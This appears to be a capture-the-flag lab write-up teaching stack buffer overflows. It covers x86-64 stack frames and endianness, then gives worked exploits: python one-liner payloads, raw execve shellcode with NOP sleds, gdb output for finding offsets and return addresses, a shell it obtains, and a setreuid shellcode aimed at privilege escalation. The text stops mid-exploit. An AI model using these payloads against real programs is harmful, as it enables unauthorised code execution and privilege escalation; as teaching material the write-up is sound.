Process Layout

When a program runs on a machine, the computer runs it as a process. Current computer architectures allow multiple processes to run concurrently. While these processes may appear to run at the same time, on a single core the computer actually switches between them very quickly, which makes it look as though they are running simultaneously. Switching between processes is called a context switch. Since each process may need different information to run (e.g. the current instruction to execute), the operating system has to keep track of all the information in a process. The memory of a process is organised sequentially and has the following layout, listed here from the highest addresses to the lowest:

  • The user stack contains the information required to run the program. This includes the current program counter, saved registers and more. The section after the user stack is unused memory, which is used in case the stack grows (downwards).
  • Shared library regions are used to link libraries, either statically or dynamically, that are used by the program.
  • The heap grows and shrinks dynamically depending on whether the program dynamically allocates memory. Notice that there is an unassigned section above the heap, which is used in the event that the heap grows.
  • The program code and data region stores the program executable and initialised variables.

x86-64 Procedures

A program usually consists of multiple functions, and there needs to be a way of tracking which function has been called and which data is passed from one function to another. The stack is a region of contiguous memory addresses that makes it easy to transfer control and data between functions. The top of the stack is at the lowest memory address in use, and the stack grows towards lower memory addresses. The most common operations on the stack are:

  • Pushing: used to add data onto the stack
  • Popping: used to remove data from the stack

push var

This is the assembly instruction to push a value onto the stack. It does the following:

  • Takes var, or the value stored at the memory location of var
  • Decrements the stack pointer (known as rsp) by 8
  • Writes that value to the new location of rsp, which is now the top of the stack

pop var

This is the assembly instruction to read a value and pop it off the stack. It does the following:

  • Reads the value at the address given by the stack pointer (rsp), which points to the top of the stack
  • Increments the stack pointer by 8
  • Stores the value that was read into var
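The push and pop steps can be modelled in a few lines of Python. This is only a sketch: the Stack class, its dictionary-backed memory and the starting address 0x7fffffffe000 are illustrative assumptions, not a description of how a CPU is implemented.

```python
class Stack:
    """Toy model of the x86-64 stack: 8-byte slots, growing towards lower addresses."""

    def __init__(self, rsp=0x7FFFFFFFE000):  # hypothetical starting address
        self.rsp = rsp
        self.memory = {}  # address -> value stored in that 8-byte slot

    def push(self, value):
        self.rsp -= 8                  # decrement the stack pointer by 8
        self.memory[self.rsp] = value  # write the value at the new top of the stack

    def pop(self):
        value = self.memory[self.rsp]  # read the value at the top of the stack
        self.rsp += 8                  # increment the stack pointer by 8
        return value                   # the caller stores this into var


stack = Stack()
stack.push(4)
stack.push(5)
print(hex(stack.rsp))  # 16 bytes below the starting address
print(stack.pop())     # 5: the last value pushed comes off first
print(stack.pop())     # 4
```

Note that pop does not erase the old slot; it only moves rsp, which is also how the real instruction behaves.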

Each compiled program may include multiple functions, where each function would need to store local variables, arguments passed to the function and more. To make this easy to manage, each function has its own separate stack frame, where each new stack frame is allocated when a function is called, and deallocated when the function is complete. 

This is easily explained using an example. Look at the two functions:

int add(int a, int b){
   int new = a + b;
   return new;
}

int calc(int a, int b){
   int final = add(a, b);
   return final;
}

calc(4, 5)

Procedures Continued

The explanation assumes that the current point of execution is inside the calc function. In this case calc is known as the caller function and add is known as the callee function. The following presents the assembly code inside the calc function.

[Figure: disassembly of the calc function]

The add function is invoked using the call instruction in assembly, in this case callq sym.add. The call instruction can either take a label as an argument (e.g. a function name), or it can take a memory address as an offset to the location of the start of the function, in the form call *value. Once the add function has been invoked (and after it has completed), the program needs to know where to continue execution. To do this, the call instruction pushes the address of the next instruction onto the stack, in this case the address of the instruction on the line that contains movl %eax, local_4h, and changes the instruction pointer to the first instruction of the function. The function then allocates its own stack frame: it saves the caller's frame pointer, sets the frame pointer (rbp) to the start of the new frame, and moves the stack pointer (rsp) to the new top of the stack.

Once the function has finished executing, it restores the state of its caller and executes the return instruction (retq). First, the stack frame of the add function is deallocated: the stack pointer (rsp) is moved back to the top of calc's part of the stack, and the frame pointer (rbp) is restored to the stack frame of calc. The retq instruction then pops the return address off the stack and changes the instruction pointer to that address.
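The control transfer itself can be sketched as follows. The dictionary used as a CPU and all addresses are hypothetical values chosen for illustration; only the push-then-jump and pop-then-jump behaviour is taken from the description above.

```python
def call(cpu, target, return_address):
    """Model of `call target`: push the return address, then jump to the target."""
    cpu["rsp"] -= 8
    cpu["memory"][cpu["rsp"]] = return_address
    cpu["rip"] = target


def ret(cpu):
    """Model of `ret`: pop the return address into the instruction pointer."""
    cpu["rip"] = cpu["memory"][cpu["rsp"]]
    cpu["rsp"] += 8


# Hypothetical addresses, chosen only for illustration.
ADD_ENTRY = 0x400500   # first instruction of add
AFTER_CALL = 0x400540  # instruction in calc that follows the call

cpu = {"rip": 0x40053B, "rsp": 0x7FFFFFFFE000, "memory": {}}
call(cpu, ADD_ENTRY, AFTER_CALL)
print(hex(cpu["rip"]))  # 0x400500: execution is now inside add
ret(cpu)
print(hex(cpu["rip"]))  # 0x400540: execution resumes in calc
```

The ret model simply trusts whatever value sits at the top of the stack, which is why a return address that has been overwritten in memory redirects execution.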

Now that we’ve understood how control is transferred through functions, let’s look at how data is transferred. 

In the above example, we saw that functions take arguments. The calc function takes 2 arguments (a and b). Up to 6 integer or pointer arguments can be passed in the following registers, in this order:

  • rdi
  • rsi
  • rdx
  • rcx
  • r8
  • r9

Note: rax is a special register that stores the return value of the function (if any).

If a function has any more arguments, these are passed on the stack.
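As a rough illustration of this rule, the sketch below assigns a list of argument values to registers and spills the rest to the stack. The place_arguments helper is hypothetical, and it assumes every argument is an integer or a pointer.

```python
ARG_REGISTERS = ["rdi", "rsi", "rdx", "rcx", "r8", "r9"]


def place_arguments(args):
    """Split integer arguments into register-passed and stack-passed values."""
    in_registers = dict(zip(ARG_REGISTERS, args))  # first six go in registers
    on_stack = list(args[len(ARG_REGISTERS):])     # anything beyond six is spilled
    return in_registers, on_stack


regs, stack_args = place_arguments([4, 5])  # calc(4, 5)
print(regs)        # {'rdi': 4, 'rsi': 5}
print(stack_args)  # []

regs, stack_args = place_arguments([1, 2, 3, 4, 5, 6, 7, 8])
print(stack_args)  # [7, 8]
```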

We can now see that a caller function may keep values in registers, but what happens if a callee function also wants to use those registers? To ensure the values are not overwritten, the callee first saves the values of the registers on its stack frame, uses the registers and then loads the saved values back into the registers before returning. The caller can also save values on its own stack frame to prevent them from being overwritten. Here are the rules for which registers are caller saved and which are callee saved:

  • rax is caller saved
  • rdi, rsi, rdx, rcx, r8 and r9 are caller saved (and they are usually arguments for functions)
  • r10, r11 are caller saved
  • rbx, r12, r13, r14, r15 are callee saved
  • rbp is also callee saved(and can be optionally used as a frame pointer)
  • rsp is callee saved

So far, this is a more thorough example of the run-time stack:

[Figure: detailed layout of the run-time stack]

Endianness

In the above programs, you can see that the binary information is represented in hexadecimal format. Different architectures store the bytes of the same multi-byte number in different orders, and this is what is referred to as endianness. Let's take the value 0x12345678 as an example. Here the least significant byte is the rightmost one (78), while the most significant byte is the leftmost one (12).

Little Endian is where the value is arranged from the least significant byte to the most significant byte, so the bytes are stored at increasing addresses as 78 56 34 12.

Big Endian is where the value is arranged from the most significant byte to the least significant byte, so the bytes are stored at increasing addresses as 12 34 56 78.

Here, each “value” requires at least a byte to represent, as part of a multi-byte object.
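The two byte orders can be checked with Python's struct module. This is a small sketch using the same example value; the variable names are arbitrary.

```python
import struct

value = 0x12345678

little = struct.pack("<I", value)  # "<" = little endian, "I" = 4-byte unsigned int
big = struct.pack(">I", value)     # ">" = big endian

print(" ".join(f"{b:02x}" for b in little))  # 78 56 34 12
print(" ".join(f"{b:02x}" for b in big))     # 12 34 56 78

# Reading the little-endian bytes back gives the original value.
print(hex(int.from_bytes(little, "little")))  # 0x12345678
```

x86-64 is little endian, which is why addresses in the payloads later on are written with their lowest byte first.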

Overwriting Variables

Now that we’ve looked at all the background information, let’s explore how the overflows actually work. If you take a look at the overflow-1 folder, you’ll notice some C code with a binary program. Your goal is to change the value of the integer variable. 

[Figure: C source code of the overflow-1 program]

From the C code you can see that the integer variable and the character buffer are declared next to each other. Since memory is allocated in contiguous bytes, you can assume that they are also adjacent in memory.

Note: this may not always be the case. Depending on how the compiler and stack are configured, variables may need to be aligned to particular size boundaries (e.g. 8 bytes, 16 bytes) when they are allocated, to make memory allocation and deallocation easier. So if a 12-byte array is allocated where the stack is aligned to 16 bytes, the compiler automatically adds 4 bytes of padding so that the size of the variable matches the stack alignment.

[Figure: a 12-byte array followed by 4 bytes of padding on a 16-byte aligned stack]

From the image of the stack above, we can assume that the stack frame for the main function looks like this:

[Figure: stack frame of the main function]
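The 4 bytes of padding in the note above come from rounding the size up to the next multiple of the alignment. A minimal sketch of that arithmetic follows; padded_size is a hypothetical helper, and real compilers may lay out a frame differently.

```python
def padded_size(size, alignment):
    """Round size up to the next multiple of alignment."""
    return (size + alignment - 1) // alignment * alignment


size = 12
total = padded_size(size, 16)
print(total)         # 16
print(total - size)  # 4 bytes of padding
```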

Even though the stack grows downwards, data that is copied or written into the buffer is written from lower to higher addresses. Depending on how data is entered into the buffer, it is therefore possible to overwrite the integer variable. From the C code, you can see that the gets function is used to read data into the buffer from standard input. The gets function is dangerous because it performs no length check. This means that you can enter more than 14 bytes of data, which then overwrites the integer variable.

Try running the C program in this folder to overwrite the above variable!

Because the buffer has a size of 14, we can exploit the vulnerability with:

python -c "print('a' * 14 + 'toto')" | ./program
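The effect of that input can be simulated without the binary. The sketch below assumes that the integer sits directly after the 14-byte buffer with no padding, which may not match the real frame; the frame bytearray and the unsafe_gets helper are illustrative stand-ins for the stack and for gets.

```python
import struct

BUFFER_SIZE = 14
VARIABLE_OFFSET = BUFFER_SIZE  # assumption: the int directly follows the buffer

frame = bytearray(32)  # hypothetical slice of main's stack frame, all zeroes


def unsafe_gets(frame, data):
    """Copy data into the frame from offset 0 with no length check, as gets does."""
    for offset, byte in enumerate(data + b"\x00"):  # gets appends a terminating NUL
        frame[offset] = byte


def read_variable(frame):
    """Read the 4-byte little-endian int stored after the buffer."""
    return struct.unpack_from("<i", frame, VARIABLE_OFFSET)[0]


print(read_variable(frame))       # 0 before the overflow
unsafe_gets(frame, b"a" * BUFFER_SIZE + b"toto")
print(hex(read_variable(frame)))  # 0x6f746f74: the bytes "toto" read as a little-endian int
```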

Overwriting Function Pointers

For this example, look at the overflow-2 folder. Inside this folder, you'll notice the following C code.

[Figure: C source code of the func-pointer program]

To begin, we run the program through gdb. With 15 * A, the lowest byte of the address that the program jumps to is overwritten with one 41, which corresponds to one A:

[user1@ip-10-10-50-167 overflow-2]$ gdb func-pointer
GNU gdb (GDB) Red Hat Enterprise Linux 8.0.1-30.amzn2.0.3
Copyright (C) 2017 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law.  Type "show copying"
and "show warranty" for details.
This GDB was configured as "x86_64-redhat-linux-gnu".
Type "show configuration" for configuration details.
For bug reporting instructions, please see:
<http://www.gnu.org/software/gdb/bugs/>.
Find the GDB manual and other documentation resources online at:
<http://www.gnu.org/software/gdb/documentation/>.
For help, type "help".
Type "apropos word" to search for commands related to "word"...
Reading symbols from func-pointer...(no debugging symbols found)...done.
(gdb) run
Starting program: /home/user1/overflow-2/func-pointer 
Missing separate debuginfos, use: debuginfo-install glibc-2.26-32.amzn2.0.1.x86_64
AAAAAAAAAAAAAAA

Program received signal SIGSEGV, Segmentation fault.
0x0000000000400041 in ?? ()

Then, by entering 20 * A, we can see that the address is filled with six 41 bytes. We cannot add more, because one more A overwrites too far and the program crashes elsewhere:

(gdb) run
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /home/user1/overflow-2/func-pointer 
AAAAAAAAAAAAAAAAAAAA

Program received signal SIGSEGV, Segmentation fault.
0x0000414141414141 in ?? ()
(gdb) run
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /home/user1/overflow-2/func-pointer 
AAAAAAAAAAAAAAAAAAAAA

Program received signal SIGSEGV, Segmentation fault.
0x00000000004005da in main ()
(gdb) print special
$1 = {<text variable, no debug info>} 0x400567 <special>

Finally, we add the address of the special function (0x400567, in little-endian byte order) after the 14 a characters.

[user1@ip-10-10-50-167 overflow-2]$ python -c "print('a' * 14 + '\x67\x05\x40')" | ./func-pointer 
this is the special function
you did this, friend!
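The byte string '\x67\x05\x40' used above is simply the address 0x400567 in little-endian order with its zero high bytes dropped. A short sketch with Python's struct module shows the conversion; the variable names are arbitrary.

```python
import struct

special = 0x400567                   # address printed by gdb for special
packed = struct.pack("<Q", special)  # 8-byte little-endian pointer
print(packed)                        # b'g\x05@\x00\x00\x00\x00\x00'

address_bytes = packed.rstrip(b"\x00")  # drop the zero high bytes
payload = b"a" * 14 + address_bytes
print(payload)                          # b'aaaaaaaaaaaaaag\x05@'
```

Dropping the zero bytes works here on the assumption that the upper bytes of the overwritten pointer are already zero, as the gdb output 0x0000000000400041 suggests.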

Buffer Overflows

For this example, look at the overflow-3 folder. Inside this folder, you'll find the following C code.

[Figure: C source code of the buffer-overflow program]

This example will cover some of the more interesting and useful things you can do with a buffer overflow. In the previous examples, we've seen that when a program takes user-controlled input, it may not check the length, and thus a malicious user could overwrite values and actually change variables.

In this example, we can see that the copy_arg function uses strcpy to copy input from a string (argv[1], a command line argument) into a buffer of length 140 bytes. By nature, strcpy does not check the length of the data being copied, so here it is also possible to overflow the buffer, and this time we can do something more malicious.

Let's take a look at what the stack will look like for the copy_arg function (this stack excludes the stack frame for the strcpy function):

[Figure: stack frame of the copy_arg function]

Earlier, we saw that when a function (in this case main) calls another function (in this case copy_arg), it needs to add the return address on the stack so the callee function (copy_arg) knows where to transfer control to once it has finished executing. From the stack above, we know that data will be copied upwards from buffer[0] towards buffer[139]. Since we can overflow the buffer, it also follows that we can overwrite the return address with our own value. We can control where the function returns and change the flow of execution of the program (very cool, right?).

Now that we know we can control the flow of execution by pointing the return address at some memory address, how do we actually do something useful with this? This is where shellcode comes in; shellcode quite literally is code that will open up a shell. More specifically, it is a sequence of binary instructions that can be executed. Since shellcode is just machine code (in the form of binary instructions), you can usually start off by writing a C program that does what you want, compiling it to assembly and extracting the hex bytes (alternatively, you can write your own assembly). For now we'll use this shellcode that opens up a basic shell:

\x48\xb9\x2f\x62\x69\x6e\x2f\x73\x68\x11\x48\xc1\xe1\x08\x48\xc1\xe9\x08\x51\x48\x8d\x3c\x24\x48\x31\xd2\xb0\x3b\x0f\x05

So let's look at actually executing this shellcode. The basic idea is that we need to point the overwritten return address to the shellcode, but where do we actually store the shellcode and what actual address do we point it at? Why don't we store the shellcode in the buffer? Because we know the address of the beginning of the buffer, we can just overwrite the return address to point to the start of the buffer. Here's the general process so far:

  • Find out the address of the start of the buffer and the start address of the return address
  • Calculate the difference between these addresses so you know how much data to enter to overflow
  • Start out by entering the shellcode in the buffer, entering random data between the shellcode and the return address, and the address of the buffer in the return address

In theory, this looks like it would work quite well. However, memory addresses may not be the same on different systems, or even on the same computer when the program is recompiled. So we can make this more flexible using a NOP instruction. A NOP instruction is a no-operation instruction: when the system processes this instruction, it does nothing and carries on execution. A NOP instruction is represented using \x90. Putting NOPs as part of the payload means an attacker can jump anywhere in the memory region that contains NOPs and eventually reach the intended instructions. This is what an injection vector would look like:

[NOP sled][shellcode][random data][memory address]

You’ve probably noticed that shellcode, memory addresses and NOP sleds are usually in hex code. To make it easy to pass the payload to an input program, you can use python:

python -c "print('\x90' * 30 + '\x48\xb9\x2f\x62\x69\x6e\x2f\x73\x68\x11\x48\xc1\xe1\x08\x48\xc1\xe9\x08\x51\x48\x8d\x3c\x24\x48\x31\xd2\xb0\x3b\x0f\x05' + '\x41' * 60 + '\x60\x20\xa2\xf7\xff\x7f')" | ./program_name
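The one-liner above relies on Python 2, where a string is a sequence of raw bytes. In Python 3, print would encode '\x90' as two UTF-8 bytes, so a payload is better built as a bytes object. The sketch below is one way to do that; build_payload and write_raw are hypothetical helpers, and the counts and address are the placeholder values from the command above, not values measured on a target.

```python
import struct
import sys

SHELLCODE = (
    b"\x48\xb9\x2f\x62\x69\x6e\x2f\x73\x68\x11\x48\xc1\xe1\x08\x48\xc1"
    b"\xe9\x08\x51\x48\x8d\x3c\x24\x48\x31\xd2\xb0\x3b\x0f\x05"
)


def build_payload(nop_count, shellcode, padding_count, return_address):
    """Lay out the injection vector: NOP sled, shellcode, padding, return address."""
    address = struct.pack("<Q", return_address)[:6]  # low 6 bytes, little endian
    return b"\x90" * nop_count + shellcode + b"\x41" * padding_count + address


def write_raw(payload):
    """Write the payload to stdout as raw bytes, bypassing text encoding."""
    sys.stdout.buffer.write(payload)


payload = build_payload(30, SHELLCODE, 60, 0x7FFFF7A22060)
print(len(payload))         # 126 = 30 + 30 + 60 + 6
print(payload[-6:].hex())   # 6020a2f7ff7f
```

Calling write_raw(payload) instead of print would emit the bytes unchanged, so the output could be piped or passed to the program in the same way as the Python 2 one-liner.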

Firstly, we have to find the number of characters needed to reach the return address:

[user1@ip-10-10-144-140 overflow-3]$ gdb --args buffer-overflow AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Reading symbols from buffer-overflow...(no debugging symbols found)...done.
(gdb) run
Starting program: /home/user1/overflow-3/buffer-overflow AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Missing separate debuginfos, use: debuginfo-install glibc-2.26-32.amzn2.0.1.x86_64
Here's a program that echo's out your input
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

Program received signal SIGSEGV, Segmentation fault.
0x0000000000400041 in ?? ()

We can see that with 153 * A the first byte of the return address is overwritten.

Now, we determine the maximum size of the payload:

[user1@ip-10-10-144-140 overflow-3]$ gdb --args buffer-overflow AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Reading symbols from buffer-overflow...(no debugging symbols found)...done.
(gdb) run
Starting program: /home/user1/overflow-3/buffer-overflow AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Missing separate debuginfos, use: debuginfo-install glibc-2.26-32.amzn2.0.1.x86_64
Here's a program that echo's out your input
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

Program received signal SIGSEGV, Segmentation fault.
0x0000000000400563 in copy_arg ()

With 159 * A we have gone too far, so the maximum size is 158.

So let's craft a payload:

[user1@ip-10-10-144-140 overflow-3]$ python
Python 2.7.16 (default, Jul 19 2019, 23:05:17) 
[GCC 7.3.1 20180712 (Red Hat 7.3.1-6)] on linux2
Type "help", "copyright", "credits" or "license" for more information.
>>> shellcode = '\x48\xb9\x2f\x62\x69\x6e\x2f\x73\x68\x11\x48\xc1\xe1\x08\x48\xc1\xe9\x08\x51\x48\x8d\x3c\x24\x48\x31\xd2\xb0\x3b\x0f\x05'
>>> len(shellcode)
30
>>> payload = '\x90' * 90 + shellcode + 'A' * 32 + 'B' * 6
>>> len(payload)
158

The memory address is 6 bytes long, so we use 6 * B in order to recognise them in the return address:

(gdb) run $(python -c "print('\x90' * 90 + '\x48\xb9\x2f\x62\x69\x6e\x2f\x73\x68\x11\x48\xc1\xe1\x08\x48\xc1\xe9\x08\x51\x48\x8d\x3c\x24\x48\x31\xd2\xb0\x3b\x0f\x05' + 'A' * 32 + 'B' * 6)")
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /home/user1/overflow-3/buffer-overflow $(python -c "print('\x90' * 90 + '\x48\xb9\x2f\x62\x69\x6e\x2f\x73\x68\x11\x48\xc1\xe1\x08\x48\xc1\xe9\x08\x51\x48\x8d\x3c\x24\x48\x31\xd2\xb0\x3b\x0f\x05' + 'A' * 32 + 'B' * 6)")
Here's a program that echo's out your input
������������������������������������������������������������������������������������������H�/bin/shH�H�QH�<$H1Ұ;AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBBBB

Program received signal SIGSEGV, Segmentation fault.
0x0000424242424242 in ?? ()

That's a success! Now we need to find the address of the shellcode. To do so, we print the memory where the shellcode is located. We print 100 units of memory starting at rsp - 158, because rsp holds the stack pointer and we know that the payload has a size of 158. The memory printed should begin with NOPs:

(gdb) x/100x $rsp-158
0x7fffffffe252: 0x90909090      0x90909090      0x90909090      0x90909090
0x7fffffffe262: 0x90909090      0x90909090      0x90909090      0x90909090
0x7fffffffe272: 0x90909090      0x90909090      0x90909090      0x90909090
0x7fffffffe282: 0x90909090      0x90909090      0x90909090      0x90909090
0x7fffffffe292: 0x90909090      0x90909090      0x90909090      0x90909090
0x7fffffffe2a2: 0x90909090      0x90909090      0x622fb948      0x732f6e69
0x7fffffffe2b2: 0xc1481168      0xc14808e1      0x485108e9      0x48243c8d
0x7fffffffe2c2: 0x3bb0d231      0x4141050f      0x41414141      0x41414141
0x7fffffffe2d2: 0x41414141      0x41414141      0x41414141      0x41414141
0x7fffffffe2e2: 0x41414141      0x42424141      0x42424242      0xe3e80000
0x7fffffffe2f2: 0x7fffffff      0x00000000      0x00020000      0x05a00000
0x7fffffffe302: 0x00000040      0x302a0000      0x7ffff7a4      0x00000000
0x7fffffffe312: 0x00000000      0xe3e80000      0x7fffffff      0x00000000
0x7fffffffe322: 0x00020004      0x05640000      0x00000040      0x00000000
0x7fffffffe332: 0x00000000      0x41590000      0x81598c13      0x045071f6
0x7fffffffe342: 0x00000040      0xe3e00000      0x7fffffff      0x00000000
0x7fffffffe352: 0x00000000      0x00000000      0x00000000      0x41590000
0x7fffffffe362: 0x7e264173      0x41598e09      0x6e91d897      0x00008e09
0x7fffffffe372: 0x00000000      0x00000000      0x00000000      0x00000000
0x7fffffffe382: 0x00000000      0xe4000000      0x7fffffff      0xe1300000
0x7fffffffe392: 0x7ffff7ff      0x76560000      0x7ffff7de      0x00000000
0x7fffffffe3a2: 0x00000000      0x00000000      0x00000000      0x00000000
0x7fffffffe3b2: 0x00000000      0x04500000      0x00000040      0xe3e00000
0x7fffffffe3c2: 0x7fffffff      0x047a0000      0x00000040      0xe3d80000
0x7fffffffe3d2: 0x7fffffff      0xdf800000      0x7ffff7ff      0x00020000

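As you can see, the NOP sled runs from 0x7fffffffe252 up to the row at 0x7fffffffe2a2, where the shellcode begins (the word 0x622fb948). The rows of this dump are not aligned on an 8-byte boundary, so to be sure of the address, we realign the pointer.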

(gdb) x/100x $rsp-160
0x7fffffffe248: 0xffffe648      0x00007fff      0x90909090      0x90909090
0x7fffffffe258: 0x90909090      0x90909090      0x90909090      0x90909090
0x7fffffffe268: 0x90909090      0x90909090      0x90909090      0x90909090
0x7fffffffe278: 0x90909090      0x90909090      0x90909090      0x90909090
0x7fffffffe288: 0x90909090      0x90909090      0x90909090      0x90909090
0x7fffffffe298: 0x90909090      0x90909090      0x90909090      0x90909090
0x7fffffffe2a8: 0xb9489090      0x6e69622f      0x1168732f      0x08e1c148
0x7fffffffe2b8: 0x08e9c148      0x3c8d4851      0xd2314824      0x050f3bb0
0x7fffffffe2c8: 0x41414141      0x41414141      0x41414141      0x41414141
0x7fffffffe2d8: 0x41414141      0x41414141      0x41414141      0x41414141
0x7fffffffe2e8: 0xffffe2a8      0x007fff66      0xffffe3e8      0x00007fff
0x7fffffffe2f8: 0x00000000      0x00000002      0x004005a0      0x00000000
0x7fffffffe308: 0xf7a4302a      0x00007fff      0x00000000      0x00000000
0x7fffffffe318: 0xffffe3e8      0x00007fff      0x00040000      0x00000002
0x7fffffffe328: 0x00400564      0x00000000      0x00000000      0x00000000
0x7fffffffe338: 0xf7bfdd97      0x25c4f6f9      0x00400450      0x00000000
0x7fffffffe348: 0xffffe3e0      0x00007fff      0x00000000      0x00000000
0x7fffffffe358: 0x00000000      0x00000000      0x3adfdd97      0xda3b0986
0x7fffffffe368: 0xa33bdd97      0xda3b1931      0x00000000      0x00000000
0x7fffffffe378: 0x00000000      0x00000000      0x00000000      0x00000000
0x7fffffffe388: 0xffffe400      0x00007fff      0xf7ffe130      0x00007fff
0x7fffffffe398: 0xf7de7656      0x00007fff      0x00000000      0x00000000
0x7fffffffe3a8: 0x00000000      0x00000000      0x00000000      0x00000000
0x7fffffffe3b8: 0x00400450      0x00000000      0xffffe3e0      0x00007fff
0x7fffffffe3c8: 0x0040047a      0x00000000      0xffffe3d8      0x00007fff
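gdb prints each 32-bit word as a number, so on a little-endian machine the bytes inside a word appear reversed relative to their order in memory. The sketch below converts one row of the realigned dump back into byte order to locate where the NOPs end; words_to_bytes and first_non_nop are hypothetical helpers written for this illustration.

```python
import struct

NOP = 0x90


def words_to_bytes(words):
    """Convert 32-bit words as printed by gdb back into memory byte order."""
    return b"".join(struct.pack("<I", word) for word in words)


def first_non_nop(row_address, words):
    """Return the address of the first byte in the row that is not a NOP, or None."""
    for offset, byte in enumerate(words_to_bytes(words)):
        if byte != NOP:
            return row_address + offset
    return None


# Row copied from the realigned dump above.
row_address = 0x7FFFFFFFE2A8
row_words = [0xB9489090, 0x6E69622F, 0x1168732F, 0x08E1C148]

print(words_to_bytes(row_words)[:4].hex())         # 909048b9
print(hex(first_non_nop(row_address, row_words)))  # 0x7fffffffe2aa
```

Any address between the start of the sled and that first shellcode byte is a usable target, since execution slides through the NOPs into the shellcode.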

We can append the address 0x7fffffffe298, which lies inside the NOP sled, to the end of our payload:

(gdb) run $(python -c "print('\x90' * 90 + '\x48\xb9\x2f\x62\x69\x6e\x2f\x73\x68\x11\x48\xc1\xe1\x08\x48\xc1\xe9\x08\x51\x48\x8d\x3c\x24\x48\x31\xd2\xb0\x3b\x0f\x05' + 'A' * 32 + '\x98\xe2\xff\xff\xff\x7f')")
Starting program: /home/user1/overflow-3/buffer-overflow $(python -c "print('\x90' * 90 + '\x48\xb9\x2f\x62\x69\x6e\x2f\x73\x68\x11\x48\xc1\xe1\x08\x48\xc1\xe9\x08\x51\x48\x8d\x3c\x24\x48\x31\xd2\xb0\x3b\x0f\x05' + 'A' * 32 + '\x98\xe2\xff\xff\xff\x7f')")
Missing separate debuginfos, use: debuginfo-install glibc-2.26-32.amzn2.0.1.x86_64
Here's a program that echo's out your input
������������������������������������������������������������������������������������������H�/bin/shH�H�QH�<$H1Ұ;AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA�����

Program received signal SIGSEGV, Segmentation fault.
0x00007fffffffe2c8 in ?? ()

After many failed attempts, I found a different shellcode.

The new shellcode is 40 bytes long instead of 30, so the padding shrinks from 32 to 22 characters. With the updated payload, this works:

(gdb) run $(python -c "print('\x90' * 90 + '\x6a\x3b\x58\x48\x31\xd2\x49\xb8\x2f\x2f\x62\x69\x6e\x2f\x73\x68\x49\xc1\xe8\x08\x41\x50\x48\x89\xe7\x52\x57\x48\x89\xe6\x0f\x05\x6a\x3c\x58\x48\x31\xff\x0f\x05' + 'A' * 22 + '\x98\xe2\xff\xff\xff\x7f')")
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /home/user1/overflow-3/buffer-overflow $(python -c "print('\x90' * 90 + '\x6a\x3b\x58\x48\x31\xd2\x49\xb8\x2f\x2f\x62\x69\x6e\x2f\x73\x68\x49\xc1\xe8\x08\x41\x50\x48\x89\xe7\x52\x57\x48\x89\xe6\x0f\x05\x6a\x3c\x58\x48\x31\xff\x0f\x05' + 'A' * 22 + '\x98\xe2\xff\xff\xff\x7f')")
Here's a program that echo's out your input
������������������������������������������������������������������������������������������j;XH1�I�//bin/shI�APH��RWH��j<XH1�AAAAAAAAAAAAAAAAAAAAAA�����
process 5242 is executing new program: /usr/bin/bash
sh-4.2$ id
Detaching after fork from child process 5246.
uid=1001(user1) gid=1001(user1) groups=1001(user1)
sh-4.2$ ls -la
Detaching after fork from child process 5247.
total 20
drwxrwxr-x 2 user1 user1   72 Sep  2  2019 .
drwx------ 7 user1 user1  169 Nov 27  2019 ..
-rwsrwxr-x 1 user2 user2 8264 Sep  2  2019 buffer-overflow
-rw-rw-r-- 1 user1 user1  285 Sep  2  2019 buffer-overflow.c
-rw------- 1 user2 user2   22 Sep  2  2019 secret.txt
sh-4.2$ cat secret.txt 
Detaching after fork from child process 5248.
cat: secret.txt: Permission denied

But reading secret.txt gives a permission denied error: the shell still runs as user1, while the file belongs to user2.

So let's use pwntools to craft a shellcode that calls setreuid with 1002 (the id of user2):

root@bastion:~# pwn shellcraft -f d amd64.linux.setreuid 1002
\x31\xff\x66\xbf\xea\x03\x6a\x71\x58\x48\x89\xfe\x0f\x05
>>> payload = '\x31\xff\x66\xbf\xea\x03\x6a\x71\x58\x48\x89\xfe\x0f\x05'
>>> len(payload)
14

We prepend this shellcode to the previous one and reduce the number of padding characters accordingly (from 22 to 8):

